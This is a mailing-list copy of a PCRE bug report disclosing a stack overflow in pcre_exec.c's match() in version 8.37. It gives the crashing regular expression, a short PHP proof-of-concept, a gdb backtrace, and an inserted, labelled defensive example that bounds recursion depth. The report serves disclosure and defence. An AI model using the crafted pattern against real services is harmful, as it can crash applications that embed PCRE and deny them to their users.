[pcre-dev] [Bug 1673] New: PCRE Library Call Stack Overflow …

Author: admin
Date:  
To: pcre-dev
Subject: [pcre-dev] [Bug 1673] New: PCRE Library Call Stack Overflow Vulnerability in pcre_exec.c
https://bugs.exim.org/show_bug.cgi?id=1673

            Bug ID: 1673
           Summary: PCRE Library Call Stack Overflow Vulnerability in
                    pcre_exec.c
           Product: PCRE
           Version: 8.37
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities of the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx and PHP.
The PCRE library is prone to a vulnerability that leads to a call stack overflow:
without sufficient bounds checking inside match(), the stack can be exhausted
(overflowed) by a crafted regular expression.
------------------------------------------------------------------
II. Description
The latest version of PCRE is prone to a stack overflow vulnerability, which can
be triggered by the following regular expression.

/(?(?=.*b)b|^(?(?=.*b)br^)+)+/

To reproduce the problem, use the pcretest tool provided with the PCRE library,
or an application that embeds PCRE, such as PHP.
For pcretest, simply type the regular expression at the re> prompt.
For PHP, the latest version, PHP 5.6.12 (bundling PCRE 8.37), can be made to
trigger the bug with the following code snippet.

<?php
preg_match("/(?(?=.*b)b|^(?(?=.*b)br^)+)+/","ADLAB");
?>

Other versions and applications may also be affected.
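A defender-side counterpart to the snippet above, added here as an example and not part of the report: it runs the same pattern and subject with PHP's pcre.recursion_limit set low enough that PCRE stops with PCRE_ERROR_RECURSIONLIMIT (surfaced by PHP as PREG_RECURSION_LIMIT_ERROR) before the C stack is exhausted, so the caller gets a false return and an error code instead of a SIGSEGV. The function name and the limit value of 5000 are assumptions; the point is that PHP's stock default of 100000 is far more frames than the roughly 16,000 the backtrace below shows at the moment of the crash, so the limit has to be sized to the thread's stack rather than left at the default.

```php
<?php
// Added example, not the report's own code: bound PCRE's recursion depth so a
// pathological pattern fails cleanly instead of overflowing the call stack.

function bounded_preg_match($pattern, $subject, $recursionLimit = 5000)
{
    // pcre.recursion_limit is PHP_INI_ALL, so it can be lowered per call.
    // 5000 is an assumed value; choose it from the thread's stack size
    // (a match() frame is several hundred bytes), not from the php.ini default.
    $saved = ini_get('pcre.recursion_limit');
    ini_set('pcre.recursion_limit', (string) $recursionLimit);

    $matched = preg_match($pattern, $subject); // 1, 0, or false on error
    $error   = preg_last_error();              // must be read before anything else runs

    ini_set('pcre.recursion_limit', $saved);

    // Translate the error code to a name for logging.
    $names = array(
        PREG_NO_ERROR              => 'PREG_NO_ERROR',
        PREG_INTERNAL_ERROR        => 'PREG_INTERNAL_ERROR',
        PREG_BACKTRACK_LIMIT_ERROR => 'PREG_BACKTRACK_LIMIT_ERROR',
        PREG_RECURSION_LIMIT_ERROR => 'PREG_RECURSION_LIMIT_ERROR',
        PREG_BAD_UTF8_ERROR        => 'PREG_BAD_UTF8_ERROR',
    );
    if (defined('PREG_JIT_STACKLIMIT_ERROR')) {      // PHP >= 7.0 only
        $names[PREG_JIT_STACKLIMIT_ERROR] = 'PREG_JIT_STACKLIMIT_ERROR';
    }

    return array(
        'matched' => $matched,
        'error'   => isset($names[$error]) ? $names[$error] : 'UNKNOWN(' . $error . ')',
    );
}

// Pattern and subject taken from the report above.
$result = bounded_preg_match('/(?(?=.*b)b|^(?(?=.*b)br^)+)+/', 'ADLAB');
printf("matched=%s error=%s\n", var_export($result['matched'], true), $result['error']);

// A well-behaved pattern passes through unchanged.
$ok = bounded_preg_match('/^AD.*B$/', 'ADLAB');
printf("matched=%s error=%s\n", var_export($ok['matched'], true), $ok['error']);
?>
```

On the interpreter path this report covers (PHP 5.x, or PHP 7+ with pcre.jit=0), the first call returns false with PREG_RECURSION_LIMIT_ERROR, which is the condition to log and treat as a failed match. On PHP 7.0 and later with pcre.jit enabled, the JIT matcher runs on its own stack and does not recurse through match(), so the same call reports either a result or PREG_JIT_STACKLIMIT_ERROR instead; disable the JIT to exercise the recursive matcher.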

The following test was conducted on Ubuntu 14.10 x64 with PHP 5.6.12:
==============================================================
(gdb) r poc.php
Starting program: /home/bins/php/sapi/cli/php poc.php

Program received signal SIGSEGV, Segmentation fault.
0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb "\035bx",
mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at
/home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516
516     {
(gdb) bt
#0  0x00000000005dcd93 in match (eptr=0x7ffff7eb2e2d "", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=0) at
/home/bins/php/ext/pcre/pcrelib/pcre_exec.c:516
#1  0x0000000000620db8 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15850)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:6178
#2  0x00000000005e7c57 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15849)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1541
#3  0x00000000005ef607 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15848)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:1388
#4  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15847)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#5  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15846)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#6  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15845)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
#7  0x0000000000635839 in match (eptr=0x7ffff7eb2e28 "ADLAB", ecode=0x1f8a8eb
"\035bx", mstart=0x7ffff7eb2e28 "ADLAB",
    offset_top=2, md=0x7fffffffa740, eptrb=0x0, rdepth=15844)
    at /home/bins/php/ext/pcre/pcrelib/pcre_exec.c:2061
------------------------------------------------------------------
III. Impact
Stack Overflow
------------------------------------------------------------------
IV. Affected
PCRE 8.37 is confirmed to be vulnerable.
PCRE2 is not affected.
Other versions and applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.


--
You are receiving this mail because:
You are on the CC list for the bug.